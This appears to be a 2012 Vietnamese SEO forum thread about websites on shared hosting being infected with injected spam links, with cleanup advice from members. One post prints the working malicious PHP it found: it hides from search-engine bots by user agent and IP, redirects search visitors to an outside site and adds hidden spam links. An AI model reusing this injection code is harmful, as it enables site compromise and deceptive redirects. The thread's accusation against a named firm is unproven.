1. Hiện tại có một số member mạo danh BQT để giao dịch trên diễn đàn và đã LỪA ĐẢO khá nhiều tại chuyên mục Adwords... Mọi người cảnh giác và đọc bài: Giới thiệu giao dịch đảm bảo bởi @Admin

Có phải bị Nova hack local website, chèn link bất hợp pháp không???

Thảo luận trong 'Seo Report - Blacklist Seo' bắt đầu bởi trungbatigol, 7/8/12.

Lượt xem: 6,855
  1. trungbatigol

    trungbatigol Top 8

    Gia nhập:
    3/12/10
    Bài viết:
    739
    Đã được thích:
    52
    Web:
    CHào các bác, chắc các bác không lạ gì vụ hack local một server rồi chiếm toàn bộ kiểm soát server ấy, bao nhiêu hosting trên đó là chiếm sạch, chui tọt vào database hay cpnel mà tung hoành.
    Hiện tại em đang có vài host bên digipower, thời gian gần đây suốt ngày phải đi xóa link vì có bọn nào nó vào nó đặt liên tục. Hôm nay quá là bức xúc sau cả tháng trời phải xóa link không dám nói - vì sợ nó giở trò khác với site của mình không thể chịu được mà report cho anh em, có bằng chứng hẳn hoi. Chẳng nhẽ lại nhịn mà im mãi saoo

    Mời các bác xem, cái này em làm hôm nay 7/8/2012
    Em còn vài site nữa bị tương tự cơ
    Đây là trò hèn hạ nhất mà em từng thấy, rất nhiều site khác cùng ip này đang dính mà họ không hề hay biết, một cách hút máu cực kì khốn nạn.
    Ở đây có nhiều bằng chứng cho rằng Nova đã dùng, em không dám quy kết mà chỉ nêu ra bằng chứng cho các bác ngự lãm. Cần em sẽ phi lên Nova hỏi, vì em biết cty này và vài lần lên rồi. Cái chính em cần là chứng minh ĐI ĐÊM LẮM CÓ NGÀY GẶP MA, chả nề nà quen biết gì hết.



    report by:
    trungbatigol
    p/s sao k xóa đc bài nhỉ @@

    Last edited: 20/10/12
    meobloghoigiasu thích bài này.
  2. Thi Phạm

    Thi Phạm Cựu mod

    Gia nhập:
    8/10/11
    Bài viết:
    1,004
    Đã được thích:
    554
    Re: SEO NOVA hack local website, chèn link bất hợp pháp?? Có bằng chứng!

    bác đề nghị chuyển server khác, server này chắc dính shell rùi, hoặc thuê bên nào đó bảo mật hơn (không local attack được)
    trungbatigol thích bài này.
  3. xinhzzz

    xinhzzz Top 9

    Gia nhập:
    14/4/12
    Bài viết:
    86
    Đã được thích:
    7
    Re: SEO NOVA hack local website, chèn link bất hợp pháp?? Có bằng chứng!

    tốt nhất là chi tiền chuyển host bác ạ .
    trungbatigol thích bài này.
  4. hqdung

    hqdung Top 9

    Gia nhập:
    23/11/11
    Bài viết:
    51
    Đã được thích:
    3
    Web:
    Re: SEO NOVA hack local website, chèn link bất hợp pháp?? Có bằng chứng!

    NOVA nó dám lại vậy hả! Ôi! Thảm họa! ^:)^ :-w
    trungbatigol thích bài này.
  5. trungbatigol

    trungbatigol Top 8

    Gia nhập:
    3/12/10
    Bài viết:
    739
    Đã được thích:
    52
    Web:
    Re: SEO NOVA hack local website, chèn link bất hợp pháp?? Có bằng chứng!

    Thế ta ko làm gì được nó à.
    Chả nhẽ cứ để như vậy sao?
    Nó cứ ỉa ở đâu là ta lại phải chạy đi chỗ khác à các bác :-&
    Mai em report tới khách hàng chúng nó cho chúng nó biết chúng nó thuê phải thằng ăn cắp ăn trộm :)) dọa cho khách nó sợ.
  6. lamvt

    lamvt Cựu Administrator

    Gia nhập:
    14/9/11
    Bài viết:
    973
    Đã được thích:
    1,123
    Web:
    Re: SEO NOVA hack local website, chèn link bất hợp pháp?? Có bằng chứng!

    Bác này có bằng chứng cụ thể bác có thể check LOG của host là ra, xem họ vào = đường nào.... và nếu thêm bằng chứng, chứ đưa cái code thế kia nhỡ đối thủ của Nova họ cố tình chơi Nova thì sao??.
    Vì vậy cũng chưa thật sự khẳng định

    Theo em thấy Việc dùng Temp chừa đồ Null cũng là nguyên nhân để khách nó add thêm vài đoạn Malware hoặc code của họ.

    http://www.tinhnguyenniemtin.com//templates/gk_icki_sports/templateDetails.xml

    http://trungbatigol.com//templates/gk_yourflash/templateDetails.xml

    http://thiepnhanai.com/templates/rt_mixxmag_j15/templateDetails.xml


    Ngay cả cái site trungbatigol của bác cũng bị add Virus thế kia làm sao mà tránh cho được site của khách hàng bác??

    Em thiết nghĩ cả 3 site của bác đều bị vậy.
    Bác cần check lại Sercurities. có bằng chứng cụ thể thì hãy nói người ta.
    bác cần check liên hệ em check cho.


    Thân mến

    P/S: em cũng chả biết bác Trung là ai, em cũng chả quen ai bên Nova nhé.
    trungbatigol thích bài này.
  7. trungbatigol

    trungbatigol Top 8

    Gia nhập:
    3/12/10
    Bài viết:
    739
    Đã được thích:
    52
    Web:
    Re: SEO NOVA hack local website, chèn link bất hợp pháp?? Có bằng chứng!

    Hiện tại em có bằng chứng là mấy cái site chèn vào:

    thì 1 site thế này
    [​IMG]
    site mazda này cũng có logo của Nova
    [​IMG]

    Còn mấy phần Log hay bảo mật em lại chưa rõ cho lắm.
    Để em thử gọi hỏi 1 số khách hàng bên đó xác minh xem sao.

    còn site của em dính virus em tìm 2 ngày nay chưa ra được đây bác ạ :((.
  8. BADSEO

    BADSEO Top 7

    Gia nhập:
    1/4/11
    Bài viết:
    288
    Đã được thích:
    108
    Web:
    Re: SEO NOVA hack local website, chèn link bất hợp pháp?? Có bằng chứng!

    Bạn tải hết code về, dùng KIS scan xem sao. Check mấy file index.html và index.php xem có base64 ko.....

    Tips: Bạn vào web bạn bằng ff, f5 để load lại site nhanh mắt nhìn thanh trang thái góc dưới phía tay trái của FF, xem nó load data từ những site nào ---> Mở source bằng Dreamwear ( nhớ tạo project nhé )---> tìm với từ khóa là site bạn nhìn thấy ở trên trong all files --> có thể thấy file bị dính mã độc;;)
    trungbatigol thích bài này.
  9. lamvt

    lamvt Cựu Administrator

    Gia nhập:
    14/9/11
    Bài viết:
    973
    Đã được thích:
    1,123
    Web:
    Re: SEO NOVA hack local website, chèn link bất hợp pháp?? Có bằng chứng!

    em có check qua mấy site bác để ở chữ ký, đúng là có bị add text link để dạng absoluted.
    Còn cái site chính của bác dính cả malware virus nữa, và cũng có link đó.

    Việc bác đưa NOVA vào đây có vẻ như giải pháp không hay.
    Bác có thể liên hệ em check giúp bác, chứ 1 mất mười ngờ, mà nếu lý do không chính đáng thì còn bị tội Vu Vạ nữa đó bác.

    Thân mến
    @ có anh em nào Nova thì có thể giải thích giùm

    ---------- Post added at 10:57 AM ---------- Previous post was at 10:53 AM ----------

    Cách này không ăn thua.
    chỉ fix được cục shit họ để lại thôi, cái căn bản là xem họ vào bằng đường nào rùi, bịt nó lại cho họ đỡ ị,
    Em có kinh nghiệm Fix hơn 20 websites Joomla bị add malware, Bác cứ tin tưởng ở em.
    trungbatigol thích bài này.
  10. ahieu88

    ahieu88 Top 9

    Gia nhập:
    27/6/12
    Bài viết:
    45
    Đã được thích:
    7
    Re: SEO NOVA hack local website, chèn link bất hợp pháp?? Có bằng chứng!

    nhờ pác này đi chủ thớt.đôi khi bị mã hóa trong data rồi. xóa lại có lại. pải diệt tận gốc. hoặc modun hay tem bị gài sẵn khi share.
    trungbatigol thích bài này.
  11. trungbatigol

    trungbatigol Top 8

    Gia nhập:
    3/12/10
    Bài viết:
    739
    Đã được thích:
    52
    Web:
    Thật ra là em ko cho rằng Nova chèn mã độc vào cái của em mà chỉ hack để chèn link SEO thôi ạ.
    Nghe nói đã liên hệ anh Toản admin để bắt xóa bài em :D, nhưng mà em đây là cái log các bác xem hộ em xem có phải của nova ko nhé:
    http://www.mediafire.com/?9i1nu76e1nlenlb

    Còn cái kia trông cậy bác Lâm ạ :((
  12. dulichhanoi

    dulichhanoi Top 9

    Gia nhập:
    5/7/11
    Bài viết:
    141
    Đã được thích:
    17
    Chèn link tự động dẫn đến website khác mình cũng bị dính rồi. Các mã độc hại mã hóa base 64 và nằm trong các file index.* và các file java. Khi mình xóa chưa hết tất cả các file có chứa mã độc, chỉ cần còn lại 1 file chứa mã độc thôi thì khi chạy website nó lại nhân bản lên như đầu. Cái này mình phải download database + code về máy, xóa hết trên host đi. Sau đó đổi lại TK đăng nhập CP cũng như FPT. Check và xóa tất cả đoạn mã độc ở bộ code mình tải về, kiểm tra database. Sau đó up lại lên mới hết được tình trạng đó :D
  13. vietnamurl1

    vietnamurl1 Cựu mod

    Gia nhập:
    14/6/10
    Bài viết:
    1,520
    Đã được thích:
    145
    Nơi ở:
    Bắc Ninh
    Post bài đúng chuyên mục
    Không chèn link spam
    Không nói bậy sử dụng ngôn từ không phù hợp.
    => Khó kiếm ra cớ để xóa bài khi không có sự giải thích từ phía còn lại. :) . Mình nghĩ admin cũng sẽ không làm thế.
    Đặt gạch ngồi hóng các bác :p
  14. lamvt

    lamvt Cựu Administrator

    Gia nhập:
    14/9/11
    Bài viết:
    973
    Đã được thích:
    1,123
    Web:
    Không đưa FTP và Controlpanel nê không kiểm tra được chính xác.

    1. Bộ code này share chùa vẫn giữ nguyên cả admin và pass của người share code (phán đoán) vì:
    Còn đấy là 1 tý dấu tích nó để lại.

    Mã:
    [3:52:13 PM] lamvt: $is_bot = FALSE ;
    $user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#',
                                   '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i',
                                   '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i',
                                   '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i',
                                   '#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i',
                                   '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i',
                                   '#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i',
                                   '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',
                                   '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',
                                   '#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i',
                                   '#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i',
                                   '#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i',
                                   '#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i',
                                   '#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#altavista#i',
                                   '#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i',
                                   '#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i',
                                   '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',
                                   '#charlotte#i', '#ngb#i' ) ; 
     
    $stop_ips_masks = array(
            "66\.249\.[6-9][0-9]\.[0-9]+",    // Google    NetRange:   66.249.64.0 - 66.249.95.255
            "74\.125\.[0-9]+\.[0-9]+",        // Google     NetRange:   74.125.0.0 - 74.125.255.255
            "65\.5[2-5]\.[0-9]+\.[0-9]+",    // MSN        NetRange:   65.52.0.0 - 65.55.255.255,
            "74\.6\.[0-9]+\.[0-9]+",        // Yahoo    NetRange:   74.6.0.0 - 74.6.255.255
            "67\.195\.[0-9]+\.[0-9]+",        // Yahoo#2    NetRange:   67.195.0.0 - 67.195.255.255
            "72\.30\.[0-9]+\.[0-9]+",        // Yahoo#3    NetRange:   72.30.0.0 - 72.30.255.255
            "38\.[0-9]+\.[0-9]+\.[0-9]+",     // Cuill:     NetRange:   38.0.0.0 - 38.255.255.255
            "93\.172\.94\.227",                // MacFinder
            "212\.100\.250\.218",            // Wells Search II
            "71\.165\.223\.134",            // Indy Library
            "70\.91\.180\.25",
            "65\.93\.62\.242",
            "74\.193\.246\.129",
            "213\.144\.15\.38",
            "195\.92\.229\.2",
            "70\.50\.189\.191",
            "218\.28\.88\.99",
            "165\.160\.2\.20",
            "89\.122\.224\.230",
            "66\.230\.175\.124",
            "218\.18\.174\.27",
            "65\.33\.87\.94",
            "67\.210\.111\.241",
            "81\.135\.175\.70",
            "64\.69\.34\.134",
            "89\.149\.253\.169"
        );
    // ��������� ��� ��� ����� ��� ���
    foreach ( $stop_ips_masks as $k=>$v )
    {
        if ( preg_match( '#^'.$v.'$#', $_SERVER['REMOTE_ADDR']) )
            $is_bot = TRUE ;
    }
    // ��������� ��� ��� ����� ��� ���
    if ( $is_bot || !( FALSE === strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) )
    {
    }else{
    $code = '<script>
    var r=document.referrer,t="",q;
    if(r.indexOf("google.")!=-1)t="q";
    if(r.indexOf("msn.")!=-1)t="q";
    if(r.indexOf("yahoo.")!=-1)t="p";
    if(r.indexOf("altavista.")!=-1)t="q";
    if(r.indexOf("aol.")!=-1)t="query";
    if(r.indexOf("ask.")!=-1)t="q";
    if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))
    window.location="http://bullyingandschool.com/wp-includes/js/go.php?keyword="+r.substring(q+2+t.length).split("&")[0];
    </script>';
    echo $code;
    }
    
    ?>
    
    <body id="bg">
    <span style="position: absolute; top: -100px; overflow: auto"><strong><em> 
    <a href="http://dieuhoacaocap.vn" title="dieu hoa">dieu hoa</a>
    <a href="http://noithat365.net" title="noi that">noi that</a>
    <a href="http://noithat365.net" title="nội thất">nội thất</a>
    <a href="http://sajsc.net" title="thiet ke website">thiet ke website</a>
    <a href="http://noithat365.net" title="gach tranh">gach tranh</a>
    <a href="http://dieuhoacaocap.vn/?cat=41" title="dieu hoa tu dung">dieu hoa tu dung</a></em></strong>
    </span>
    [3:52:23 PM] lamvt: đấy code nó đấy
    Như vậy cho thấy: CÓ 1 vài chú add code vào site này chứ không phải chỉ duy nhất.


    Và cũng hãi mãi bác admin này:


    Nhận định cá nhân:
    Admin kiểu này thì khỏi cần các hacker họ thăm, vì thiết nghĩ các hacker chân chính họ không bao giờ làm mấy vụ lẻ tẻ này.
    Còn việc này chỉ là kết quả của việc dùng đồ Null và Admin quá yếu mà thôi.


    Thân mến
  15. NovaAds

    NovaAds Seo Newbie

    Gia nhập:
    29/8/12
    Bài viết:
    3
    Đã được thích:
    0
    Nơi ở:
    Vietnam
    Web:
    Chào trungbatigol và các ACE đã quan tâm và đưa ý kiến ở chủ đề này!

    NovaAds xin khẳng định không làm công việc hack local website, chèn link bất hợp pháp như bạn trungbatigol đã đặt ra câu hỏi nghi vấn. Bạn cũng đã cố tìm chứng cứ, nhưng không có mình chứng nào khẳng định cho nghi vấn của bạn đươc. Và vì nghi vấn đó làm tổn thất tới uy tín của NovaAds, chúng tôi đề nghị bạn Trungbatigol đưa ra kết luận khẳng định để xác nhận uy tín của NovaAds và đề nghị Ban Quản Trị website xóa chủ đề này để tránh gây hiểu nhầm thông tin. Tất cả chúng ta ai cũng có quyền nghi vấn, nhưng không được gây tổn thất tới danh dự, uy tín của người khác nếu nghi vấn đó không có chứng cứ xác đáng.

    Cảm ơn tất cả mọi người và chúc bạn trungbatigol sẽ quản trị tốt hơn các website của mình!
  16. trungbatigol

    trungbatigol Top 8

    Gia nhập:
    3/12/10
    Bài viết:
    739
    Đã được thích:
    52
    Web:
    Hi bà con, lâu lâu em mới lên topic này. Đợt đấy em có cung cấp log cho một số bác nhờ phân tích (chứ em thì gà) thì cũng chưa đưa ra vấn đề gì.
    Hôm có gọi điện lên Nova và lên Nova chơi thì biết đúng là mấy site khách hàng của Nova song họ cũng không xác định được ai đã gài vào? Hay là một trò chơi Nova thì em không biết.
    Tuy nhiên cũng không có bằng chứng cụ thể buộc lỗi Nova, hi vọng trong tương lai Nova không còn tồn tại điều tai tiếng tương tự nữa.

    Topic này sẽ làm ảnh hưởng ít nhiều tới Nova nên xin phép các bác khép lại và 2 hôm nữa em sẽ tự tay xóa. Khi nào có thêm bằng chứng mới sự vụ mới Nova "lộ hàng" ae ta lại chém ạ :)).

    Từ đây cũng là bài học cho các bên nào mà chơi xấu thì ảnh hưởng cũg vũ bão lắm đấy các bác nhỉ ;)

    p/s: Cảm ơn bác Lamvt đã nhiệt tình, em đã tìm ra lỗi và fix được vụ đặt link ạ.
  17. newbie_seo

    newbie_seo Top 9

    Gia nhập:
    3/12/10
    Bài viết:
    36
    Đã được thích:
    5
    Web:
    Bức xúc quá bà con ơi, chả là mình mua hosting ở công ty ở ngõ ngay đoạn giáp giữa đường Phạm Văn Đồng và Hoàng Quốc Việt, có địa chỉ IP: 123.30.172.179. Bao lần mình cũng bị gài backlink của một số website khách hàng của mình trên đó. Xoá nhiều lần rồi, mình cũng đã đặt một câu chú thích vào website là: "Bạn đừng gài back link lên website của người khác vô ý như thế, vì đó là hành động của kẻ tiểu nhân". Thế mà hôm nay vào xem, lại thấy họ đặt link và xoá luôn cả dòng comment đó đi. Không biết là do nhân viên của họ cố tình làm hay là do host đó bị hack. Mình đã thay đổi account nhiều lần rồi mà nó vẫn vào được. Các anh em nên cẩn thận kiểm tra lại website của mình cho chắc kẻo bị đặt link mà ko biết.
    Last edited: 26/9/12
  18. thuytopcb01

    thuytopcb01 Top 10

    Gia nhập:
    19/9/12
    Bài viết:
    23
    Đã được thích:
    2
    Nơi ở:
    Hà Nội
    Web:
    có rất nhiều thông tin về tập đoàn
    không biết thực hư ra sao đây? nhưng các bạn trước khi thuê một bên nào đó nhờ SEO thì cũng nên tìm hiểu rõ về đối tác
  19. mshuong

    mshuong Top 9

    Gia nhập:
    20/5/11
    Bài viết:
    363
    Đã được thích:
    8
    Nơi ở:
    Hà Nội
    Web:
    Lâu nay cặm cụi SEO, chả để ý mấy cái web tiếng việt, nay làm trang web mới và seo thử, tình hình chắc lại phải chuyển host thôi, đi đâu cũng gặp NOVA, chán hẳn.
  20. doiseocom

    doiseocom Top 10

    Gia nhập:
    26/7/12
    Bài viết:
    17
    Đã được thích:
    4
    Web:
    :D, chào chị Hương, Nova họ làm seo và adwords từ đầu, nên gặp họ là phải.
    Mình ko bênh vực bên nào nhưng bạn chủ thớt không chưa được chứng cứ rõ ràng chỉ dựa vào backlink mà nói thế thì có vẻ là sai rồi.

    Bạn cần đưa ra chứng cứ thuyết phục một chút, chứ có ai hack website của bạn rồi chèn link mà những website nova đang seo thì cũng là nova hack à :D

    Những topic như thế này chắc ko nên có vì bác chắc cũng nhiều tuổi đủ để biết thế nào là đúng là sai.
    Dạo này cũng thấy rất nhiều tin về Nova có lẽ nào là chiêu PR kiểu mới.

Nội quy khi thảo luận:

Dù bạn có cố tình spam bằng cách nào khi BQT diễn đàn phát hiện sẽ lập tức banned nick và xoá toàn bộ bài viết của bạn. Ngoài ra khi phát hiện ra Spam hãy gửi thông báo cho BQT diễn đàn. Hãy suy nghĩ trước khi hành động..!
✓ Khi muốn trả lời ai đó, bạn gõ @ cộng thêm nick diễn đàn của người đó phía sau @, giống như tag tên trên Facebook.
✓ Yêu cầu khi bình luận, bạn phải gõ chữ rõ ràng, không viết tắt, gõ tiếng Việt đầy đủ dấu câu.
✓ Nên dùng font chữ mặc định của diễn đàn, không tô màu lòe loẹt hay dùng size chữ quá lớn khi bình luận.
✓ Bài viết, comment... không được phép quảng cáo dịch vụ, rao vặt, pr... Loại trừ ở chuyên mục Rao vặt đã cho phép.
✓ Nghiêm cấm các chủ đề dạng: Cứu em với, help me, giật tít, câu view... dưới mọi hình thức.
✓ Tất cả các thành viên tham gia diễn đàn cần đọc kỹ Nội quy chung và nghiêm túc tuân thủ.


Chia sẻ trang này

Đang tải...